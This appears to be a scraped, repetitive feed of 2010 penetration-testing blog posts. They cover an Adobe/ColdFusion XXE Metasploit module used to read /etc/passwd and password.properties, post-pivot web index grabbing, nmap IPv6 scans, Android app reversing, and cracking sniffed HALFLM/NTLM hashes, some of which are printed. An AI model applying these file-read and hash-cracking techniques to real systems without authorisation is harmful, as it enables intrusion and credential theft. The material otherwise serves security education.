2 -->its enabled by default on all those products you've never heard of except for ColdFusion, with the exception of CF 8 which appears to have it turned on by default.
3 -->You have to apply patches for CF individually and there is no automated process. Since this vuln got little media attention I've seen alot of hosts that are still missing this patch and/or didn't turn off the vuln service.

On with the demo!

So against a patched host or someone that has disabled the service in ColdFusion you'll see one of two things; either 404's for the checks or 200 for /flex2gateway/ and 500 for the http or https check.

If you get a bunch of 400's then you need to set the VHOST

When it works, you'll see something like this for /etc/passwd

and like this when you asked for a file that doesn't exist or doesn't have permission to read (since CF doesn't run as root on linux, requesting /etc/shadow wont work) :-(

At this point, you're probably like "so what" well whats cool about arbitrary file read is that 1. it also works on Windows:

and 2. that whole password.properties attack is now cool again because you can just request that file too

-CG
Tags:

5:57
Adobe XML Injection Metasploit Module
» ‎ Carnal0wnage

I just pushed out code coverage for the Adobe XML External Entity Injection vulnerability in multiple adobe products including: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and
8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data
Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2

References Here:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3960
http://www.osvdb.org/62292
http://www.securityfocus.com/bid/38197
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
http://www.adobe.com/support/security/bulletins/apsb10-05.html

I recommend you read security-asessment's pdf on it, its good.

Anyway, its a cool bug.
1 -->because it affects several products although most people have probably never heard of most of them except for ColdFusion.
2 -->its enabled by default on all those products you've never heard of except for ColdFusion, with the exception of CF 8 which appears to have it turned on by default.
3 -->You have to apply patches for CF individually and there is no automated process. Since this vuln got little media attention I've seen alot of hosts that are still missing this patch and/or didn't turn off the vuln service.

On with the demo!

So against a patched host or someone that has disabled the service in ColdFusion you'll see one of two things; either 404's for the checks or 200 for /flex2gateway/ and 500 for the http or https check.

If you get a bunch of 400's then you need to set the VHOST

When it works, you'll see something like this for /etc/passwd

and like this when you asked for a file that doesn't exist or doesn't have permission to read (since CF doesn't run as root on linux, requesting /etc/shadow wont work) :-(

At this point, you're probably like "so what" well whats cool about arbitrary file read is that 1. it also works on Windows:

and 2. that whole password.properties attack is now cool again because you can just request that file too

-CG
Tags: xml coldfusion adobe password-properties security-bulletins external-entity

October 08, 2010
6:32
A new definition of "win"
» ‎ carnal0wnage.attackresearch.com

Ben Tomhave has a good post over on his blog

http://www.secureconsulting.net/2010/10/there_is_no_win.html

go read it. its short...wont take long, I promise.

In part I agree, you are never going to "win" by keeping an attacker out. Like he puts in the post:
-->
read more

Tags:
6:03
A new definition of "win"
» ‎ carnal0wnage.attackresearch.com

Ben Tomhave has a good post over on his blog

http://www.secureconsulting.net/2010/10/there_is_no_win.html

go read it. its short...wont take long, I promise.

In part I agree, you are never going to "win" by keeping an attacker out. Like he puts in the post:
Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).
Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.
Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one adobe/flash/java/whatever 0day away from failing to keep attackers out and thus "losing".

Surviving a network attack is not the same as surviving a mortar attack on a FOB where if I'm still breathing and have use of my limbs at the end of it i can call that a "win". In turn, its not a successful penetration test or attack if merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). Its a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case while the business may have thought they "survived" they in fact "lost".

We're getting really good at teaching our clients how to catch penetration testers and their methodologies and conditioning them that this a "win" when in fact most times defenders fail to see and catch people with a modified methodology, non public tools, or "non-standard" goals.
Tags:

6:03
A new definition of "win"
» ‎ Carnal0wnage

Ben Tomhave has a good post over on his blog

http://www.secureconsulting.net/2010/10/there_is_no_win.html

go read it. its short...wont take long, I promise.

In part I agree, you are never going to "win" by keeping an attacker out. Like he puts in the post:
Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).
Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.
Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one adobe/flash/java/whatever 0day away from failing to keep attackers out and thus "losing".

Surviving a network attack is not the same as surviving a mortar attack on a FOB where if I'm still breathing and have use of my limbs at the end of it i can call that a "win". In turn, its not a successful penetration test or attack if merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). Its a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case while the business may have thought they "survived" they in fact "lost".

We're getting really good at teaching our clients how to catch penetration testers and their methodologies and conditioning them that this a "win" when in fact most times defenders fail to see and catch people with a modified methodology, non public tools, or "non-standard" goals.
Tags: chris-nickerson sheer-folly penetration-testers Pentesting

6:02
Hacking: The Next Generation Book Review
» ‎ carnal0wnage.attackresearch.com

Hacking: The Next Generation Book Review

Nitesh Dhanjani, Billy Rios, & Brett Hardin

5 stars

Good Intro to Next Gen Attacks

First Impressions...skinny book. Strike One. Chapter 1 -- "Intelligence Gathering: Peering Through the Windows to Your Organization" spends a lot of time on physical security and social engineering and no mention of Maltego. I'm not sure how anyone can write a book on Intelligence Gathering and NOT include Maltego. Strike Two.
-->
read more

Tags:
September 27, 2010
7:37
Hacking: The Next Generation Book Review
» ‎ carnal0wnage.attackresearch.com

Hacking: The Next Generation Book Review

Nitesh Dhanjani, Billy Rios, & Brett Hardin

5 stars

Good Intro to Next Gen Attacks

First Impressions...skinny book. Strike One. Chapter 1 -- "Intelligence Gathering: Peering Through the Windows to Your Organization" spends a lot of time on physical security and social engineering and no mention of Maltego. I'm not sure how anyone can write a book on Intelligence Gathering and NOT include Maltego. Strike Two.

At this point i was thinking I had a dud on my hands BUT Chapter 2 --- "Inside-Out Attacks: The Attacker Is the Insider" redeems. Tons of code and examples to make XSS work in "realistic" scenarios mix the right amount of tech and narrative. My only gripe was that they talked about using XSS shell for XSS exploitation instead of using BEeF which is actively maintained and developed.

All the other chapters (except for Chapter 3) were very good, none of the others are as technical as chapter 2 but I believe they cover the current trends in a entertaining and readable way. Like one reviewer mentioned the information covered in Chapter 5 -- "Cloud Insecurity: Sharing the Cloud with Your Enemy" was not what I expected. It covered high level "possible" attacks versus any "probable" attacks. With the exception of possibly making insecure VM's and getting people to run it. Chapter 7 -- "Infiltrating the Phishing Underground: Learning from Online Criminals?" was a "chapterfied" version of the authors talk on the subject. Chapter 4 -- "Blended Threats: When Applications Exploit Each Other" was a good overview of stringing vulnerabilities that would be/were not considered high risk into high risk issues by combining one or more together which actually is "next generation".

Chapter 3, IMO didnt cover anything new. Mostly a discussion of insecure protocols, arp spoofing, email spoofing. While still a relevant issue in security not "next generation".

Tags:

7:37
Hacking: The Next Generation Book Review
» ‎ Carnal0wnage

Hacking: The Next Generation Book Review

Nitesh Dhanjani, Billy Rios, & Brett Hardin

5 stars

Good Intro to Next Gen Attacks

First Impressions...skinny book. Strike One. Chapter 1 -- "Intelligence Gathering: Peering Through the Windows to Your Organization" spends a lot of time on physical security and social engineering and no mention of Maltego. I'm not sure how anyone can write a book on Intelligence Gathering and NOT include Maltego. Strike Two.

At this point i was thinking I had a dud on my hands BUT Chapter 2 --- "Inside-Out Attacks: The Attacker Is the Insider" redeems. Tons of code and examples to make XSS work in "realistic" scenarios mix the right amount of tech and narrative. My only gripe was that they talked about using XSS shell for XSS exploitation instead of using BEeF which is actively maintained and developed.

All the other chapters (except for Chapter 3) were very good, none of the others are as technical as chapter 2 but I believe they cover the current trends in a entertaining and readable way. Like one reviewer mentioned the information covered in Chapter 5 -- "Cloud Insecurity: Sharing the Cloud with Your Enemy" was not what I expected. It covered high level "possible" attacks versus any "probable" attacks. With the exception of possibly making insecure VM's and getting people to run it. Chapter 7 -- "Infiltrating the Phishing Underground: Learning from Online Criminals?" was a "chapterfied" version of the authors talk on the subject. Chapter 4 -- "Blended Threats: When Applications Exploit Each Other" was a good overview of stringing vulnerabilities that would be/were not considered high risk into high risk issues by combining one or more together which actually is "next generation".

Chapter 3, IMO didnt cover anything new. Mostly a discussion of insecure protocols, arp spoofing, email spoofing. While still a relevant issue in security not "next generation".

Tags: generation chapter book billy-rios arp-spoofing email-spoofing realistic-scenarios book reviews

September 06, 2010
11:15
Grabbing Index Pages Of Webservers
» ‎ carnal0wnage.attackresearch.com

Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.

Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.

I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.

Looks like this when it runs...
-->
read more

Tags:
September 04, 2010
16:47
Grabbing Index Pages Of Webservers
» ‎ carnal0wnage.attackresearch.com

Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.

Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.

I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.

Looks like this when it runs...

msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/ [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/

you can then check out the folder with the results

code is here:
http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/http_index_grabber.rb
Tags:

16:47
Grabbing Index Pages Of Webservers
» ‎ Carnal0wnage

Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.

Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.

I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.

Looks like this when it runs...

msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/ [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/

you can then check out the folder with the results

code is here:
http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/http_index_grabber.rb
Tags: received http index open-ports no-brainer index-pages metasploit

August 02, 2010
7:35
Scanning IPv6 Enabled Hosts
» ‎ carnal0wnage.attackresearch.com

Nmap will scan IPv6 enabled hosts if you pass it the -6 switch, but only does TCP Connect scans and no OS identification, which makes sense because OS identification uses nuances of ipv4 responses...

carnal0wnage ~: nmap -6 -sV 2002:53e9:a52a::832:3316:5042 -p53,80,222

Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-19 20:42 UTC
Nmap scan report for 2002:53e9:a52a::832:3316:5042
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.X
80/tcp open http nginx
222/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds

carnal0wnage ~: nmap -6 -sV ::ffff:66.148.86.4

Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-19 21:00 UTC
Nmap scan report for ::ffff:66.148.86.4
Host is up (0.024s latency).
Not shown: 795 closed ports, 203 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.9)
8080/tcp open http-proxy Squid webproxy 2.6.STABLE16

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds

and metasploit supports ipv6

msf auxiliary(http_version) > run

[*] 2002:53e9:a52a:0000:0000:0832:3316:5042 is running nginx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Tags:

7:35
Scanning IPv6 Enabled Hosts
» ‎ Carnal0wnage

Nmap will scan IPv6 enabled hosts if you pass it the -6 switch, but only does TCP Connect scans and no OS identification, which makes sense because OS identification uses nuances of ipv4 responses...

carnal0wnage ~: nmap -6 -sV 2002:53e9:a52a::832:3316:5042 -p53,80,222

Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-19 20:42 UTC
Nmap scan report for 2002:53e9:a52a::832:3316:5042
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.X
80/tcp open http nginx
222/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds

carnal0wnage ~: nmap -6 -sV ::ffff:66.148.86.4

Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-19 21:00 UTC
Nmap scan report for ::ffff:66.148.86.4
Host is up (0.024s latency).
Not shown: 795 closed ports, 203 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.9)
8080/tcp open http-proxy Squid webproxy 2.6.STABLE16

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds

and metasploit supports ipv6

msf auxiliary(http_version) > run

[*] 2002:53e9:a52a:0000:0000:0832:3316:5042 is running nginx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Tags: tcp nmap ipv open-ssh proxy-squid apache-httpd

6:57
Scanning IPv6 Enabled Hosts
» ‎ carnal0wnage.attackresearch.com

Nmap will scan IPv6 enabled hosts if you pass it the -6 switch, but only does TCP Connect scans and no OS identification, which makes sense because OS identification uses nuances of ipv4 responses...

carnal0wnage ~: nmap -6 -sV 2002:53e9:a52a::832:3316:5042 -p53,80,222

Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-19 20:42 UTC
Nmap scan report for 2002:53e9:a52a::832:3316:5042
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.X
80/tcp open http nginx
222/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
-->
read more

Tags:
July 28, 2010
7:53
Scapy, Traceroute and Pretty Pictures
» ‎ carnal0wnage.attackresearch.com

much much more available in the documentation
http://www.secdev.org/projects/scapy/doc/usage.html

but here is how to make a cool traceroute graph from you to another host.

from: http://www.secdev.org/projects/scapy/doc/usage.html#tcp-traceroute-2

Welcome to Scapy (v1.1.1 / -)
>>> res, unans = traceroute("www.google.com",dport=80,maxttl=20)
Begin emission:
*****************Finished to send 20 packets.
*
Received 18 packets, got 18 answers, remaining 2 packets
209.85.225.103:tcp80
1 209.20.72.2 11
2 209.20.79.6 11
3 4.53.160.189 11
-->
read more

Tags:
6:03
Scapy, Traceroute and Pretty Pictures
» ‎ carnal0wnage.attackresearch.com

much much more available in the documentation
http://www.secdev.org/projects/scapy/doc/usage.html

but here is how to make a cool traceroute graph from you to another host.

from: http://www.secdev.org/projects/scapy/doc/usage.html#tcp-traceroute-2

Welcome to Scapy (v1.1.1 / -)
>>> res, unans = traceroute("www.google.com",dport=80,maxttl=20)
Begin emission:
*****************Finished to send 20 packets.
*
Received 18 packets, got 18 answers, remaining 2 packets
209.85.225.103:tcp80
1 209.20.72.2 11
2 209.20.79.6 11
3 4.53.160.189 11
4 4.69.132.186 11
5 4.69.132.190 11
6 4.68.101.34 11
7 4.79.208.18 11
8 209.85.254.130 11
9 72.14.232.141 11
10 209.85.241.35 11
11 66.249.95.138 11
14 209.85.225.103 SA
15 209.85.225.103 SA
16 209.85.225.103 SA
17 209.85.225.103 SA
18 209.85.225.103 SA
19 209.85.225.103 SA
20 209.85.225.103 SA
>>> res.graph(target="> /tmp/graph.svg")
>>>

opening up /tmp/graph.svg will give you:

Tags:

6:03
Scapy, Traceroute and Pretty Pictures
» ‎ Carnal0wnage

much much more available in the documentation
http://www.secdev.org/projects/scapy/doc/usage.html

but here is how to make a cool traceroute graph from you to another host.

from: http://www.secdev.org/projects/scapy/doc/usage.html#tcp-traceroute-2

Welcome to Scapy (v1.1.1 / -)
>>> res, unans = traceroute("www.google.com",dport=80,maxttl=20)
Begin emission:
*****************Finished to send 20 packets.
*
Received 18 packets, got 18 answers, remaining 2 packets
209.85.225.103:tcp80
1 209.20.72.2 11
2 209.20.79.6 11
3 4.53.160.189 11
4 4.69.132.186 11
5 4.69.132.190 11
6 4.68.101.34 11
7 4.79.208.18 11
8 209.85.254.130 11
9 72.14.232.141 11
10 209.85.241.35 11
11 66.249.95.138 11
14 209.85.225.103 SA
15 209.85.225.103 SA
16 209.85.225.103 SA
17 209.85.225.103 SA
18 209.85.225.103 SA
19 209.85.225.103 SA
20 209.85.225.103 SA
>>> res.graph(target="> /tmp/graph.svg")
>>>

opening up /tmp/graph.svg will give you:

Tags: traceroute scapy graph pretty-pictures google target traceroute Visulization

July 26, 2010
7:07
Reversing Android Apps
» ‎ carnal0wnage.attackresearch.com

thanks to cktricky for pointing me to:

android-apktool

Once you've gotten it installed/unzipped its fairly easy to use. Download your .apk from the emulator.

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk 2441 KB/s (625416 bytes in 0.250s)

From there simply decode the .apk

user@dev:~/android-tutorial/reverse$ ./apktool d com.joelapenna.foursquared.apk foursquare
I: Baksmaling...
I: Loading resource table...
I: Decoding resources...
I: Loading resource table from file: /home/user/apktool/framework/1.apk
I: Copying assets and libs...

From there you should have a folder looking something like this

inside your smali folder will be all the decompiled java. have fun.

actually after i did the above, I found this which is a video covering the above and previous posts.
Tags:

7:07
Reversing Android Apps
» ‎ Carnal0wnage

thanks to cktricky for pointing me to:

android-apktool

Once you've gotten it installed/unzipped its fairly easy to use. Download your .apk from the emulator.

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk 2441 KB/s (625416 bytes in 0.250s)

From there simply decode the .apk

user@dev:~/android-tutorial/reverse$ ./apktool d com.joelapenna.foursquared.apk foursquare
I: Baksmaling...
I: Loading resource table...
I: Decoding resources...
I: Loading resource table from file: /home/user/apktool/framework/1.apk
I: Copying assets and libs...

From there you should have a folder looking something like this

inside your smali folder will be all the decompiled java. have fun.

actually after i did the above, I found this which is a video covering the above and previous posts.
Tags: apk joelapenna com resource-table adb android

July 23, 2010
7:40
Using the Android Debug Bridge (adb)
» ‎ carnal0wnage.attackresearch.com

The android debug bridge (adb) has lots of useful features. its documented here:
http://developer.android.com/guide/developing/tools/adb.html

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb
Android Debug Bridge version 1.0.25

some of the features you may want to immediately mess with are:

listing devices

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb devices
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
emulator-5554 device

getting an interactive shell on the emulator

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb shell
# ls
sqlite_stmt_journals
cache
sdcard
etc
system
sys
sbin
proc
init.rc
init.goldfish.rc
init
default.prop
data
root
dev

cat'ing useful stuff inside that shell

# cat /proc/cpuinfo
Processor : ARM926EJ-S rev 5 (v5l)
BogoMIPS : 233.47
Features : swp half thumb fastmult vfp edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant : 0x0
CPU part : 0x926
CPU revision : 5
Cache type : write-through
Cache clean : not required
Cache lockdown : not supported
Cache format : Harvard
I size : 4096
I assoc : 4
I line length : 32
I sets : 32
D size : 65536
D assoc : 4
D line length : 32
D sets : 512

Hardware : Goldfish
Revision : 0000
Serial : 0000000000000000

and probably pulling things off the file system so you can reverse them.

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk
2441 KB/s (625416 bytes in 0.250s)
Tags:

7:40
Using the Android Debug Bridge (adb)
» ‎ Carnal0wnage

The android debug bridge (adb) has lots of useful features. its documented here:
http://developer.android.com/guide/developing/tools/adb.html

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb
Android Debug Bridge version 1.0.25

some of the features you may want to immediately mess with are:

listing devices

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb devices
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
emulator-5554 device

getting an interactive shell on the emulator

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb shell
# ls
sqlite_stmt_journals
cache
sdcard
etc
system
sys
sbin
proc
init.rc
init.goldfish.rc
init
default.prop
data
root
dev

cat'ing useful stuff inside that shell

# cat /proc/cpuinfo
Processor : ARM926EJ-S rev 5 (v5l)
BogoMIPS : 233.47
Features : swp half thumb fastmult vfp edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant : 0x0
CPU part : 0x926
CPU revision : 5
Cache type : write-through
Cache clean : not required
Cache lockdown : not supported
Cache format : Harvard
I size : 4096
I assoc : 4
I line length : 32
I sets : 32
D size : 65536
D assoc : 4
D line length : 32
D sets : 512

Hardware : Goldfish
Revision : 0000
Serial : 0000000000000000

and probably pulling things off the file system so you can reverse them.

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk
2441 KB/s (625416 bytes in 0.250s)
Tags: debug cpu adb adb-devices shell-cat java-cpu android

July 21, 2010
6:42
Accessing your android emulator on the command line
» ‎ carnal0wnage.attackresearch.com

A poster on one of the other android posts mentioned you can just telnet into the android app if you've got the emulator running.Its easy to do and the preferred way if you just want to script events. Just telnet into localhost 5554 and you can issue emulator commands.user@dev:~$ telnet localhost 5554Trying ::1...Trying 127.0.0.1...Connected to localhost.Escape character is '^]'.Android Console: type 'help' for a list of commandsOKhelpAndroid console command help: help|h|? print a list of commands event simulate hardware events geo Geo-location commands gsm GSM related commands kill kill the emulator instance network manage network settings power power related commands quit|exit quit control session redir manage port redirections sms SMS related commands avd manager virtual device state window manage emulator windowhelp eventallows you to send fake hardware events to the kernelavailable sub-commands: event send send a series of events to the kernel event types list all type aliases event codes list all code aliases for a given type event text simulate keystrokes from a given textOKhelp geoallows you to change Geo-related settings, or to send GPS NMEA sentencesavailable sub-commands: geo nmea send an GPS NMEA sentence geo fix send a simple GPS fixyou get the idea...
Tags:

6:42
Accessing your android emulator on the command line
» ‎ Carnal0wnage

A poster on one of the other android posts mentioned you can just telnet into the android app if you've got the emulator running.

Its easy to do and the preferred way if you just want to script events. Just telnet into localhost 5554 and you can issue emulator commands.

user@dev:~$ telnet localhost 5554
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Android Console: type 'help' for a list of commands
OK
help

Android console command help:
help|h|? print a list of commands
event simulate hardware events
geo Geo-location commands
gsm GSM related commands
kill kill the emulator instance
network manage network settings
power power related commands
quit|exit quit control session
redir manage port redirections
sms SMS related commands
avd manager virtual device state
window manage emulator window

help event
allows you to send fake hardware events to the kernel

available sub-commands:
event send send a series of events to the kernel
event types list all type aliases
event codes list all code aliases for a given type
event text simulate keystrokes from a given text

OK

help geo
allows you to change Geo-related settings, or to send GPS NMEA sentences

available sub-commands:
geo nmea send an GPS NMEA sentence
geo fix send a simple GPS fix

you get the idea...
Tags: event emulator android location-commands hardware-events script-events

July 06, 2010
18:11
Fatal System Error Pseudo Book Review
» ‎ carnal0wnage.attackresearch.com

Fatal System Error: The Hunt for the New Crime Lords Who are Bringing Down the Internet

Pseudo Book Review since its not "really" a tech book. The book is written with very little technical jargon and its an interesting read with a mix of information on Barrett Lyon who fought DDOS attacks against various websites, the ties of online gambling and the mob with a transition into the fight by Andy Crocker, a British cybersecurity agent, against the Russian and eastern block carding cybercriminials. An entertaining read about the history of carding and denial of service attacks by eastern block criminals.

In the category of:

Masters of Deception: The Gang That Ruled Cyberspace

The Fugitive Game: Online with Kevin Mitnick

Crypto: How the Code Rebels Beat the Government Saving Privacy in the Digital Age

learn about hacker history type books.

Tags:

18:11
Fatal System Error Pseudo Book Review
» ‎ Carnal0wnage

Fatal System Error: The Hunt for the New Crime Lords Who are Bringing Down the Internet

Pseudo Book Review since its not "really" a tech book. The book is written with very little technical jargon and its an interesting read with a mix of information on Barrett Lyon who fought DDOS attacks against various websites, the ties of online gambling and the mob with a transition into the fight by Andy Crocker, a British cybersecurity agent, against the Russian and eastern block carding cybercriminials. An entertaining read about the history of carding and denial of service attacks by eastern block criminals.

In the category of:

Masters of Deception: The Gang That Ruled Cyberspace

The Fugitive Game: Online with Kevin Mitnick

Crypto: How the Code Rebels Beat the Government Saving Privacy in the Digital Age

learn about hacker history type books.

Tags: system fatal book kevin-mitnickcrypto andy-crocker lyon fatal-system-error hacker-history fugitive-game book reviews

July 01, 2010
9:56
Revisiting HALFLM Stuff
» ‎ carnal0wnage.attackresearch.com

I covered some of the halflm challenge sniffing stuff in a previous post.

but I had to revisit it the other day for work and couldn't find the actually tables and program from the post.

so here are some updated links.

where to grab the tables:

http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/

where to grab the program:

http://sourceforge.net/projects/rcracki/

Some gotchas I ran into on the last PT was some reason getting odd hashes in the SMB and NTLM sniffing modules.

in some cases the hashes were not the same for the same username and hostname, these were unusable, I also had some that had a bunch of zeros in them, those were also not crackable.

Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000

But I did get smb_login scanned, that was fun:

ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36 ADMIN Windows 2000 2195Windows 2000 